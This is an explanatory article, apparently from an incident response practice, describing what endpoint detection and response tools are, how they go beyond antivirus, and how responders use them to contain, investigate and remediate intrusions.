What is EDR?
Endpoint detection and response (EDR) has been a buzzword in the world of cybersecurity for the last couple years, but what does that really mean? EDR tools are designed to continuously monitor systems for anomalous or malicious activity. A monitoring agent runs in the background, ideally on every endpoint in the environment, and the end user experiences little to no difference in performance. When properly implemented, these tools can provide extensive insight into activity across a network, and they are often much more effective in detecting and stopping threats than traditional security tools. Other security tools can track similar adversary behavior (i.e., command and control activity, network traffic, malicious payloads) at the network level, but EDR provides greater insight into the specific actions that were performed on the endpoint where the activity is actually occurring.
But I have antivirus…
While most EDR technologies are not designed to completely replace traditional antivirus (AV), these tools go beyond AV capabilities. AV is typically designed to flag malicious programs or heuristics, which means that it is great for identifying malware that has already been observed in the wild and included in the AV tool’s definitions (assuming the AV is up to date). However, most AV tools are not designed to identify malicious activity (i.e., privilege escalation, lateral movement, use of built-in Windows tools). With attackers becoming more sophisticated every day, there are so many ways to circumvent traditional AV detection.
One example we see frequently is attackers using Base64-encoded PowerShell commands to download or propagate malware across a network. PowerShell is a trusted program, so it doesn’t trigger any AV alerts when it runs on a system. EDR, on the other hand, would see this activity as anomalous and trigger an alert. Another tactic that AV is not designed to flag is privilege escalation. Attackers on a network with legitimate credentials would not set off an AV alert, but that type of unusual activity could be flagged by an EDR tool and then reviewed by an analyst.
A third common attacker technique is to disable AV tools altogether. We often see attackers uninstalling AV products during their reconnaissance phase, and many modern malware variants have built-in functionality to disable common AV products, like Windows Defender, Malwarebytes and others. It is much less common for us to see attackers searching for EDR tools to disable or uninstall. In addition, most EDR tools have built-in alerting that can be triggered if an endpoint goes offline, so if communication with the sensor is lost due to an attacker disabling or removing the agent, this could be identified much quicker.
Using EDR for Incident Response
So we’ve established that EDR can be a great security monitoring tool, but how can we use that during an active incident? There are a few ways that we are using EDR to assist our clients during active incidents with great success. First, it helps to identify infected systems and contain the incident as quickly as possible. In the past, security teams and incident responders were often left running around to manually identify and disconnect/shut down infected systems. With EDR, everything can be tracked in a single portal, and when a system shows signs of infection, we can end malicious processes and quarantine the system to prevent further spreading much faster than before. In some cases, this tactic has allowed us to catch and stop worming malware such as Emotet and Trickbot before an eventual ransomware deployment. With this improvement, it allows one analyst (or a small team) to dictate the incident response process rather than leaving an entire team attempting to shut down various systems or terminate malicious processes. Coordination among team members is still extremely important during an incident, but EDR can help ease the burden and reduce the hours needed to effectively respond to an active threat.
We also use EDR to further our investigations during or immediately after an incident, which is especially helpful when tracking attacker movements and activity and tracing the attack back to patient zero. We are seeing a gradual progression in the incident response field, from collecting full forensic images, to triaging systems for key forensic artifacts. EDR tools allow us to narrow our focus even further with increased efficiency. We can quickly backtrack across a network to identify the point of origin and other attacker actions, deploying triage tools or collecting specific artifacts as necessary.
Once we have established indicators of compromise (IOCs), we are able to use EDR tools to quickly search the entire environment for similar indicators. This helps to identify additional systems of interest. We can pivot off these known IOCs to find additional related activity or processes, and this gives us greater insight into exactly how an attack was propagated across the network. It also allows us as the incident response team to work with the threat monitoring team to watch for those processes and patterns moving forward.
Finally, during the remediation process, an EDR solution can provide greater peace of mind to ensure that newly cleaned or rebuilt systems are not showing signs of infection. There are limitations to this (no security tool is 100% effective), but EDR can greatly assist in getting critical systems back up and running in a timely fashion to avoid major downtime. Of course, there is no substitute for completely wiping/rebuilding systems and restoring only clean data. Malware can hide in a multitude of places to establish persistence, and it is nearly impossible to ensure that a system is completely clean without rebuilding. In addition, the EDR monitoring agents can only track current activity and running processes on the system. If a malicious file is sitting dormant on a system, it generally won’t set off any alerts in the EDR tools, so malware could stay dormant and avoid detection for an extended period of time. This helps underscore the importance of maintaining traditional security tools, like AV, in tandem with an EDR solution.
Why it matters…
As an incident responder, these types of tools can make your job much easier. You can save time, energy and resources by quickly containing and tracking an incident and very quickly shift your focus to remediation and investigation. As a security professional, you can use EDR to better protect your network. You and your team can detect incidents earlier, prevent them from spreading and limit the risk and exposure to your data. From a purely business perspective, the financial benefits can be significant if an incident is detected and contained quickly. This can help reduce system downtime, preserve critical data and prevent reputational loss that comes from reporting an incident that affected third-party or customer data.
As with any security tool or control, EDR is not a silver bullet, but it can play a major role in organizational security and be a powerful asset in an incident responder’s toolkit.